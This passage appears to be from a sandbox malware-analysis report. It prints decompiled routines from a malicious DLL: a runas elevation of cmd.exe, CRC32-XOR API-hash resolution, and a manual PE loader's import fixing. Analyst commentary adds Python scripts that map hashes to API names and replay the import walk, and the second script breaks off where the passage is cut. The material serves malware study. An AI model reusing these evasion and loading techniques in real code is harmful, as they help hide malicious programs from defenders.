    						_t21 = "\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
    						_push(0);
    						_push(0);
    						_push(0);
    						if(E6ECA4230("runas", "cmd.exe", _t21) != 0) {
    							goto L7;
    						} else {
    							return 1;
    						}
    					} else {
    						if(_t15 != 0x83f0) {
    							L7:
    							return 0;
    						} else {
    							"\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _a12;
    							return 0;
    						}
    					}
    				}
    			}

    APIs
    • GetWindowLongA.USER32 ref: 6ECA9CAB
    • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 6ECA9CB8
    • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?,?,00000001,FF000000), ref: 6ECA9CCB
    • BringWindowToTop.USER32 ref: 6ECA9CD2
    • SetForegroundWindow.USER32(00000000), ref: 6ECA9CD9
    • SendMessageA.USER32 ref: 6ECA9CEF
    • SendMessageA.USER32 ref: 6ECA9CFB
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$LongMessageSend$BringForeground
    • String ID: cmd.exe$runas
    • API String ID: 4108379202-3213582026
    • Opcode ID: 8935af0231bab59f392f7ddf92d5b4d13913850429e8ad61a1b0eac9cf660c6b
    • Instruction ID: 99eb0538a8af6561b769b654f8e2245a36a92b95f52433eec61a25cbf6c2327b
    • Opcode Fuzzy Hash: 8935af0231bab59f392f7ddf92d5b4d13913850429e8ad61a1b0eac9cf660c6b
    • Instruction Fuzzy Hash: 69112B32295B117BE6105B6C8D0BFDF3A78EB82B25F104214FB11EB1C4E7B06100CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E6ECA69C0(CHAR* _a4, signed int _a8, intOrPtr _a12, signed char _a16) {
    				char _v8;
    				char _v11;
    				char _v12;
    				short _v15;
    				char _v16;
    				CHAR* _t19;
    				CHAR* _t21;
    				CHAR* _t22;
    				CHAR* _t24;
    				signed char _t26;
    				signed int _t27;
    				CHAR* _t30;
    				CHAR* _t35;
    				CHAR* _t39;
    				CHAR* _t40;
    				CHAR* _t43;
    				CHAR* _t46;
    				CHAR* _t48;
    
    				_t19 = M6ECB04CC; // 0xcb2da8
    				_t40 = M6ECB04DC; // 0x0
    				_t46 = _a4;
    				_v16 = 0x6e6468;
    				WritePrivateProfileStringA(_t40,  &_v16, _t46, _t19);
    				_t21 = M6ECB04CC; // 0xcb2da8
    				_t22 = M6ECB04DC; // 0x0
    				asm("sbb ecx, ecx");
    				_t35 =  ~_t46 & _a8;
    				_v15 = 0x70;
    				WritePrivateProfileStringA(_t22,  &_v16, _t35, _t21);
    				_t24 = M6ECB04CC; // 0xcb2da8
    				asm("sbb esi, esi");
    				_t48 =  ~_t46 &  &_v12;
    				_t43 = M6ECB04DC; // 0x0
    				_v12 = (_t35 & 0xffffff00 | _a12 != 0x00000000) + 0x30;
    				_v11 = 0;
    				_v15 = 0x73;
    				WritePrivateProfileStringA(_t43,  &_v16, _t48, _t24);
    				_t26 = _a16;
    				_v15 = 0x74;
    				_t27 = _t26 & 0x000000ff;
    				if(_t26 == 0) {
    					_t27 = 0xc;
    				}
    				wsprintfA( &_v12, "%d", _t27);
    				_t39 = M6ECB04CC; // 0xcb2da8
    				_t30 = M6ECB04DC; // 0x0
    				return WritePrivateProfileStringA(_t30,  &_v8, _t48, _t39);
    			}

    APIs
    • WritePrivateProfileStringA.KERNEL32 ref: 6ECA69EA
    • WritePrivateProfileStringA.KERNEL32(00000000,00CB2DA8,?,00CB2DA8), ref: 6ECA6A0D
    • WritePrivateProfileStringA.KERNEL32(00000000,?,?,00CB2DA8), ref: 6ECA6A45
    • wsprintfA.USER32 ref: 6ECA6A69
    • WritePrivateProfileStringA.KERNEL32(00000000,?,?,00CB2DA8), ref: 6ECA6A85
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfileStringWrite$wsprintf
    • String ID: hdn$s$t
    • API String ID: 2965074233-1328931711
    • Opcode ID: 8cc1780c7d52593f6a8324cf81de207c09a9895663850f0bc0a44f8f8d7ba8f3
    • Instruction ID: 9e95a104d66d1dd2931d9cb6f2da7f42790198d88a03cc32e02031937230cece
    • Opcode Fuzzy Hash: 8cc1780c7d52593f6a8324cf81de207c09a9895663850f0bc0a44f8f8d7ba8f3
    • Instruction Fuzzy Hash: A4213D72108652EFD704DF58C945E6BB7F9EFC9244F048A0CF99497251E274AE0CCBA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E6ECA8230(WCHAR* _a4, WCHAR* _a8) {
    				long _t4;
    				WCHAR* _t11;
    				WCHAR* _t12;
    				void* _t13;
    
    				_t12 = _a4;
    				_t11 = _a8;
    				if(_t12 == 0 || _t11 == 0) {
    					L7:
    					_push(_t11);
    					_push(_t12);
    					M6ECB05F8();
    					return _t4;
    				} else {
    					_t4 = GetFileAttributesW(_t12);
    					if((_t4 & 0xffffffef) == 0) {
    						goto L7;
    					} else {
    						_t4 = lstrcmpiW(PathFindFileNameW(_t11), L"run");
    						if(_t4 != 0) {
    							goto L7;
    						} else {
    							SetLastError(_t4);
    							_t13 = E6ECAA2F0(_t12, 0, 0);
    							if(_t13 != 0) {
    								_push(0);
    								_push(0);
    								_push(1);
    								E6ECA4230("open", _t13, 0);
    								HeapFree(GetProcessHeap(), 0, _t13);
    							}
    							return 0;
    						}
    					}
    				}
    			}

    APIs
    • GetFileAttributesW.KERNEL32(?), ref: 6ECA8243
    • PathFindFileNameW.SHLWAPI(?,run), ref: 6ECA8256
    • lstrcmpiW.KERNEL32(00000000), ref: 6ECA825D
    • SetLastError.KERNEL32(00000000), ref: 6ECA8268
      • Part of subcall function 6ECAA2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C), ref: 6ECAA311
      • Part of subcall function 6ECAA2F0: GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C,00000000,00000034,?,?,?,6ECB03A0), ref: 6ECAA323
      • Part of subcall function 6ECAA2F0: HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C,00000000,00000034,?,?,?,6ECB03A0,0000009C), ref: 6ECAA32A
      • Part of subcall function 6ECAA2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C), ref: 6ECAA33E
      • Part of subcall function 6ECA4230: RtlZeroMemory.NTDLL(0000003C,0000003C), ref: 6ECA423A
      • Part of subcall function 6ECA4230: ShellExecuteExA.SHELL32(0000003C,00000000,00000000), ref: 6ECA42A7
      • Part of subcall function 6ECA4230: WaitForSingleObject.KERNEL32(?,?), ref: 6ECA42CD
      • Part of subcall function 6ECA4230: GetExitCodeProcess.KERNEL32 ref: 6ECA42E1
      • Part of subcall function 6ECA4230: CloseHandle.KERNEL32(?), ref: 6ECA42EC
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA829A
    • HeapFree.KERNEL32(00000000), ref: 6ECA82A1
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Process$ByteCharFileMultiWide$AllocAttributesCloseCodeErrorExecuteExitFindFreeHandleLastMemoryNameObjectPathShellSingleWaitZerolstrcmpi
    • String ID: open$run
    • API String ID: 2941314601-2128457515
    • Opcode ID: d779492ca9bdb623de3e935b5e04c161a5c0c2e360bad5f3c762104374e37ea2
    • Instruction ID: b2702ae938035edfb7acfe470bff57e3711b19442547c4d17e4b6d18431e1dd1
    • Opcode Fuzzy Hash: d779492ca9bdb623de3e935b5e04c161a5c0c2e360bad5f3c762104374e37ea2
    • Instruction Fuzzy Hash: 2301FC33645E126BD6502AEC8D0DFDF7E3EAF82B25F020600FF04A7184F76498028AA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E6ECA1DB0() {
    				short _t58;
    				signed int _t60;
    				signed int _t61;
    				signed int _t63;
    				signed int _t72;
    				signed int _t73;
    				intOrPtr _t77;
    				signed int _t78;
    				CHAR* _t80;
    				signed int _t83;
    				signed int _t89;
    				intOrPtr* _t90;
    				char* _t96;
    				intOrPtr* _t101;
    				char* _t103;
    				CHAR* _t106;
    				char* _t108;
    				CHAR* _t109;
    				short _t112;
    				struct HINSTANCE__* _t115;
    				void* _t116;
    
    				_t101 =  *((intOrPtr*)(_t116 + 0x3c));
    				_t58 = 1;
    				 *(_t116 + 0x14) = 1;
    				if(_t101 == 0 ||  *_t101 != 0x5a4d) {
    					L28:
    					return _t58;
    				} else {
    					_t83 =  *((intOrPtr*)(_t101 + 0x3c)) + _t101;
    					 *(_t116 + 0x24) = _t83;
    					if( *_t83 != 0x4550) {
    						goto L28;
    					}
    					_t77 =  *((intOrPtr*)(_t83 + 0x78));
    					_t78 = _t77 + _t101;
    					 *(_t116 + 0x24) =  *((intOrPtr*)(_t77 + _t101 + 0x1c)) + _t101;
    					 *(_t116 + 0x20) =  *((intOrPtr*)(_t78 + 0x24)) + _t101;
    					_t89 =  *((intOrPtr*)(_t78 + 0x20)) + _t101;
    					 *(_t116 + 0x14) = _t78;
    					 *(_t116 + 0x1c) = _t89;
    					 *(_t116 + 0xc) = 0;
    					if( *((intOrPtr*)(_t78 + 0x18)) <= 0) {
    						L27:
    						return _t58;
    					}
    					while(1) {
    						_t106 =  *((intOrPtr*)(_t89 +  *(_t116 + 0x14) * 4)) + _t101;
    						_t60 = RtlComputeCrc32(0, _t106, lstrlenA(_t106));
    						_t96 =  *(_t116 + 0x50);
    						_t61 = _t60 ^  *(_t116 + 0x54);
    						_t112 = 0;
    						if(_t96 <= 0) {
    							goto L25;
    						}
    						_t90 =  *((intOrPtr*)(_t116 + 0x4c));
    						while(_t61 !=  *_t90) {
    							_t112 = _t112 + 1;
    							_t90 = _t90 + 0x10;
    							if(_t112 < _t96) {
    								continue;
    							}
    							goto L25;
    						}
    						_t103 =  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x2c)) + ( *( *((intOrPtr*)(_t116 + 0x28)) +  *(_t116 + 0x14) * 2) & 0x0000ffff) * 4)) +  *((intOrPtr*)(_t116 + 0x48));
    						 *((intOrPtr*)(_t116 + 0x10)) = _t112;
    						if(_t103 == 0 || _t103 < _t78 || _t103 >=  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x30)) + 0x7c)) + _t78) {
    							L22:
    							 *( *((intOrPtr*)(_t116 + 0x4c)) + 0xc + (_t112 + _t112) * 8) = _t103;
    							_t101 =  *((intOrPtr*)(_t116 + 0x48));
    							if(_t103 == 0) {
    								 *(_t116 + 0x20) = 0;
    							}
    						} else {
    							_t80 = StrDupA(_t103);
    							if(_t80 == 0) {
    								L24:
    								_t78 =  *(_t116 + 0x1c);
    								_t101 =  *((intOrPtr*)(_t116 + 0x48));
    								goto L25;
    							}
    							 *(_t116 + 0x20) = 0;
    							_t108 = StrChrA(_t80, 0x2e);
    							if(_t108 == 0) {
    								L20:
    								LocalFree(_t80);
    								if( *((intOrPtr*)(_t116 + 0x18)) == 0) {
    									goto L24;
    								}
    								_t78 =  *(_t116 + 0x1c);
    								goto L22;
    							}
    							 *_t108 = 0;
    							_t109 = _t108 + 1;
    							_t115 = GetModuleHandleA(_t80);
    							if(_t115 != 0) {
    								L18:
    								 *(_t116 + 0x1c) = 1;
    								_t72 = RtlComputeCrc32(0, _t109, lstrlenA(_t109));
    								_t73 =  *(_t116 + 0x54);
    								_push(_t73);
    								_push(0x10);
    								_push(_t116 + 0x3c);
    								_push(_t115);
    								 *(_t116 + 0x44) = _t72 ^ _t73;
    								 *((intOrPtr*)(_t116 + 0x48)) = 0;
    								 *((intOrPtr*)(_t116 + 0x4c)) = 0;
    								 *(_t116 + 0x50) = 0;
    								E6ECA1DB0();
    								_t103 =  *(_t116 + 0x50);
    								_t116 = _t116 + 0x10;
    								L19:
    								_t112 =  *((intOrPtr*)(_t116 + 0x10));
    								goto L20;
    							}
    							_t115 = LoadLibraryA(_t80);
    							if(_t115 == 0) {
    								goto L19;
    							}
    							goto L18;
    						}
    						L25:
    						_t63 =  *(_t116 + 0x14) + 1;
    						 *(_t116 + 0x14) = _t63;
    						if(_t63 <  *((intOrPtr*)(_t78 + 0x18))) {
    							_t89 =  *(_t116 + 0x24);
    							continue;
    						}
    						_t58 =  *(_t116 + 0x20);
    						goto L27;
    					}
    				}
    			}

    APIs
    • lstrlenA.KERNEL32(?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1E3E
    • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 6ECA1E48
    • StrDupA.SHLWAPI(?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1EAF
    • StrChrA.SHLWAPI(00000000,0000002E,?,00000000,?,?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1ECA
    • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1EDB
    • LoadLibraryA.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1EE8
    • lstrlenA.KERNEL32(00000001,?,00000000,?,?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1EFD
    • RtlComputeCrc32.NTDLL(00000000,00000001,00000000), ref: 6ECA1F08
    • LocalFree.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1F3F
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: ComputeCrc32lstrlen$FreeHandleLibraryLoadLocalModule
    • String ID:
    • API String ID: 1770823755-0
    • Opcode ID: 85261b7aa76f721d456226f4ae707ca36e01232a25792d2797883dae533cd0cc
    • Instruction ID: c2ec83c8c5c6cf819cf95484522207fc7ae6eab91d93b820aa4799c498ce9523
    • Opcode Fuzzy Hash: 85261b7aa76f721d456226f4ae707ca36e01232a25792d2797883dae533cd0cc
    • Instruction Fuzzy Hash: 785135B41093428FC700DF9CC894A5BBBF5BF89708F04491DFA9597345EBB1E9098B96
    Uniqueness

    Uniqueness Score: -1.00%
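E6ECA1DB0 above resolves APIs by hash rather than by name: it walks a module's export name table, computes RtlComputeCrc32(0, name, lstrlenA(name)) and XORs the result with a 32-bit key the caller passes on the stack (+0x54 in the decompile), compares that against a table of wanted hashes, and, when the matching export turns out to be a forwarder ("MODULE.Function"), loads MODULE with GetModuleHandleA/LoadLibraryA and recurses with the hash of Function. The Python script below is added here for the analyst; it is not part of the sample or of this report. It reproduces the hash so values pulled out of the sample's hash tables can be mapped back to API names offline, and it chases forwarders the same way the decompiled code does. The key value, the export tables and the addresses are constructed placeholders; against a real system the export names would come from the DLLs on disk (for example via pefile). RtlComputeCrc32 with a starting value of 0 is the ordinary reflected CRC-32 (polynomial 0xEDB88320), which is what binascii.crc32 returns.

```python
import binascii

# Constructed stand-in for real export tables (nothing here comes from the
# sample). A string value marks a forwarded export, written the way the
# loader stores it: "MODULE.Function".
FAKE_EXPORTS = {
    "kernel32.dll": {
        "LoadLibraryA": 0x7FF01000,
        "GetProcAddress": 0x7FF01010,
        "HeapAlloc": "NTDLL.RtlAllocateHeap",
    },
    "ntdll.dll": {
        "RtlAllocateHeap": 0x7FF80100,
        "RtlComputeCrc32": 0x7FF80200,
    },
}


def api_hash(name, key):
    """RtlComputeCrc32(0, name, strlen(name)) ^ key, as E6ECA1DB0 computes it.

    binascii.crc32 returns the same unsigned CRC-32 that RtlComputeCrc32
    yields for an initial value of 0, so no table of our own is needed.
    """
    return binascii.crc32(name.encode("ascii")) ^ key


def resolve_hashes(module, wanted, key, exports=FAKE_EXPORTS, _depth=0):
    """Return {hash: address} for every wanted hash found among `module`'s
    export names.

    A forwarder "MOD.Func" is chased by hashing Func with the same key and
    looking it up in MOD, mirroring the recursive call in the decompile.
    A hash that cannot be resolved is simply left out of the result.
    """
    if _depth > 8:  # guard against a forwarder cycle in malformed input
        return {}
    resolved = {}
    for name, target in exports.get(module, {}).items():
        h = api_hash(name, key)
        if h not in wanted:
            continue
        if isinstance(target, str):  # forwarded export: "NTDLL.RtlAllocateHeap"
            fwd_mod, fwd_func = target.split(".", 1)
            fwd_hash = api_hash(fwd_func, key)
            sub = resolve_hashes(fwd_mod.lower() + ".dll", {fwd_hash}, key,
                                 exports, _depth + 1)
            target = sub.get(fwd_hash)
        if target is not None:
            resolved[h] = target
    return resolved


def hash_table(key, exports=FAKE_EXPORTS):
    """Precompute {hash: (module, name)} so hashes read out of the sample's
    tables can be named without executing the sample."""
    table = {}
    for module, names in exports.items():
        for name in names:
            table[api_hash(name, key)] = (module, name)
    return table


if __name__ == "__main__":
    key = 0x1234ABCD  # placeholder: the real key lives in the sample's data
    wanted = {api_hash("HeapAlloc", key), api_hash("GetProcAddress", key)}
    for h, addr in sorted(resolve_hashes("kernel32.dll", wanted, key).items()):
        print(f"{h:08x} -> {hash_table(key)[h][1]} @ {addr:08x}")
```

To use this against the real sample, dump the hash/key pairs from the table the function receives at +0x4c, replace FAKE_EXPORTS with the export names of the DLLs on the analysis machine, and look each hash up in hash_table(key); a hash that only matches via a forwarder is the sign that the sample is pointing at the ntdll implementation behind a kernel32 stub.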

    C-Code - Quality: 82%
    			E6ECA3180(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				signed int _t21;
    				void* _t22;
    
    				_t21 = 0;
    				_t22 = HeapAlloc(GetProcessHeap(), 8, 0x800);
    				if(_t22 != 0) {
    					_t21 = RtlComputeCrc32(0, _t22, wsprintfA(_t22, "%s%s%s%c", _a4, _a8, _a12, 2)) % 0xffffff7f;
    					asm("bswap edi");
    					HeapFree(GetProcessHeap(), 0, _t22);
    				}
    				return _t21;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6ECA3192
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA3195
    • wsprintfA.USER32 ref: 6ECA31B8
    • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 6ECA31C4
    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 6ECA31D9
    • HeapFree.KERNEL32(00000000), ref: 6ECA31DC
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Process$AllocComputeCrc32Freewsprintf
    • String ID: %s%s%s%c
    • API String ID: 3834306679-489954935
    • Opcode ID: c5c8dd66cb1463e5235e69e955054958cd448733ef61d3a8883cf533ca4dbb5d
    • Instruction ID: a5f93be36df3f72bf5020acac50a3cac3955d9abf24ebbbe506c3d2540fce329
    • Opcode Fuzzy Hash: c5c8dd66cb1463e5235e69e955054958cd448733ef61d3a8883cf533ca4dbb5d
    • Instruction Fuzzy Hash: 7FF02B717416113BE200966D8C4CEBF7A6EEFC9715F008114FE0887280DA60CC018AB1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECA1720(void* __edi) {
    				struct HINSTANCE__* _v4;
    				intOrPtr* _v8;
    				intOrPtr _t40;
    				intOrPtr _t42;
    				struct HINSTANCE__* _t44;
    				signed int _t46;
    				intOrPtr _t47;
    				signed short _t48;
    				CHAR* _t49;
    				_Unknown_base(*)()* _t51;
    				signed int _t53;
    				signed int _t54;
    				signed int _t55;
    				signed int _t59;
    				void* _t60;
    				intOrPtr* _t67;
    				signed short* _t70;
    				intOrPtr _t75;
    				intOrPtr* _t78;
    				void* _t83;
    				signed short* _t88;
    				void* _t94;
    				signed short _t114;
    
    				_t83 = __edi;
    				_t40 =  *((intOrPtr*)(__edi + 0xc0));
    				if(_t40 == 0 ||  *((intOrPtr*)(__edi + 0xc4)) == 0) {
    					return 0;
    				} else {
    					_t67 =  *((intOrPtr*)(__edi + 0x144)) + _t40;
    					_t42 =  *((intOrPtr*)(_t67 + 0xc));
    					_v8 = _t67;
    					if(_t42 == 0) {
    						L30:
    						return 0;
    					} else {
    						_t94 = _v4;
    						while(1) {
    							_t44 = LoadLibraryA( *((intOrPtr*)(_t83 + 0x144)) + _t42);
    							_v4 = _t44;
    							if(_t44 == 0) {
    								break;
    							}
    							_t46 =  *(_t83 + 0x154);
    							if( *(_t83 + 0x150) < _t46) {
    								L16:
    								if(_t94 != 0) {
    									_t53 =  *(_t83 + 0x150);
    									_t54 = _t53 + 1;
    									 *(_t83 + 0x150) = _t54;
    									if( *((intOrPtr*)(_t94 + _t53 * 4)) != 0) {
    										 *((intOrPtr*)(_t94 + _t54 * 4)) = _v4;
    										 *(_t83 + 0x150) =  *(_t83 + 0x150) + 1;
    									}
    								}
    								_t47 =  *((intOrPtr*)(_t83 + 0x144));
    								_t78 = _v8;
    								_t88 =  *((intOrPtr*)(_t67 + 0x10)) + _t47;
    								_t70 = _t88;
    								if( *((intOrPtr*)(_t78 + 4)) == 0) {
    									L22:
    									_t48 =  *_t70;
    									_t114 = _t48;
    									if(_t114 == 0) {
    										L29:
    										_t42 =  *((intOrPtr*)(_t78 + 0x20));
    										_v8 = _t78 + 0x14;
    										if(_t42 != 0) {
    											_t67 = _v8;
    											continue;
    										} else {
    											goto L30;
    										}
    									} else {
    										L23:
    										L23:
    										if(_t114 >= 0) {
    											_t49 = _t48 +  *((intOrPtr*)(_t83 + 0x144)) + 2;
    										} else {
    											_t49 = _t48 & 0x0000ffff;
    										}
    										_t51 = GetProcAddress(_v4, _t49);
    										 *_t88 = _t51;
    										if(_t51 == 0) {
    											break;
    										}
    										_t48 = _t70[2];
    										_t70 =  &(_t70[2]);
    										_t88 =  &(_t88[2]);
    										if(_t48 != 0) {
    											goto L23;
    										} else {
    											_t78 = _v8;
    											goto L29;
    										}
    									}
    								} else {
    									_t75 =  *_t78;
    									if(_t75 == 0) {
    										return 8;
    									} else {
    										_t70 = _t75 + _t47;
    										goto L22;
    									}
    								}
    							} else {
    								if(_t46 == 0) {
    									_t55 = 0x10;
    								} else {
    									_t55 = _t46 + _t46;
    								}
    								 *(_t83 + 0x154) = _t55;
    								_t94 = HeapAlloc(GetProcessHeap(), 8, _t55 * 4);
    								if(_t94 == 0) {
    									return 3;
    								} else {
    									_t59 =  *(_t83 + 0x150);
    									if(_t59 != 0) {
    										RtlMoveMemory(_t94,  *(_t83 + 0x14c), _t59 + _t59 + _t59 + _t59);
    									}
    									_t60 =  *(_t83 + 0x14c);
    									if(_t60 != 0) {
    										HeapFree(GetProcessHeap(), 0, _t60);
    									}
    									 *(_t83 + 0x14c) = _t94;
    									goto L16;
    								}
    							}
    							goto L35;
    						}
    						return 6;
    					}
    				}
    				L35:
    			}

    APIs
    • LoadLibraryA.KERNEL32(?), ref: 6ECA176D
    • GetProcessHeap.KERNEL32(00000008), ref: 6ECA17B0
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA17B3
    • RtlMoveMemory.NTDLL(00000000,?,?), ref: 6ECA17DA
    • GetProcessHeap.KERNEL32(00000000,?), ref: 6ECA17EC
    • HeapFree.KERNEL32(00000000), ref: 6ECA17EF
    • GetProcAddress.KERNEL32(?,?), ref: 6ECA185F
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Process$AddressAllocFreeLibraryLoadMemoryMoveProc
    • String ID:
    • API String ID: 2239585089-0
    • Opcode ID: bafc292bdfc7496d95906a106a29c2dc29a7cb03e88a3b74a1ef7df3dc6485b2
    • Instruction ID: 0adb1068b09d416b425a720b26628d28c2efb01150126ebe320df3fb23253dfc
    • Opcode Fuzzy Hash: bafc292bdfc7496d95906a106a29c2dc29a7cb03e88a3b74a1ef7df3dc6485b2
    • Instruction Fuzzy Hash: 92416DB47007079BEB449FADD954BA6B7A5FB44315F058569ED28CB304E734E818CBA0
    Uniqueness

    Uniqueness Score: -1.00%
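E6ECA1720 is the import fixer of a manual PE mapper: it walks the IMAGE_IMPORT_DESCRIPTOR array until the Name RVA is zero, calls LoadLibraryA on each DLL (keeping the handles in a heap array at +0x14c that it grows by doubling), and for each thunk either treats a value with the high bit set as an ordinal (low 16 bits) or takes the value as the RVA of a hint/name record and skips the two-byte hint before calling GetProcAddress; the resolved address is written into the FirstThunk (IAT) slot. The Python below is an illustration added here, not code from the sample or from this report. It replays that walk over a constructed 256-byte image with a hand-built import directory, with a constructed module table standing in for LoadLibraryA/GetProcAddress; the status codes 0, 6 and 8 are chosen to match the literals returned in the decompile, and the module-handle bookkeeping is left out.

```python
import struct

IMAGE_ORDINAL_FLAG32 = 0x80000000
# IMAGE_IMPORT_DESCRIPTOR: OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name, FirstThunk
DESC_FMT = "<IIIII"
DESC_SIZE = struct.calcsize(DESC_FMT)  # 20 bytes

# Constructed stand-in for the modules a loader would LoadLibraryA; the
# addresses are made up and nothing here comes from the sample.
FAKE_MODULES = {
    "kernel32.dll": {"names": {"LoadLibraryA": 0x7FF01000,
                               "GetProcAddress": 0x7FF01010},
                     "ordinals": {}},
    "user32.dll": {"names": {}, "ordinals": {1: 0x7FE02000}},
}


def build_image():
    """Construct a 256-byte 'image' that holds only an import directory at
    RVA 0. RVAs are plain offsets because we pretend the image base is 0."""
    img = bytearray(0x100)
    struct.pack_into(DESC_FMT, img, 0x00, 0x40, 0, 0, 0xA0, 0x50)  # kernel32: ILT 0x40, IAT 0x50
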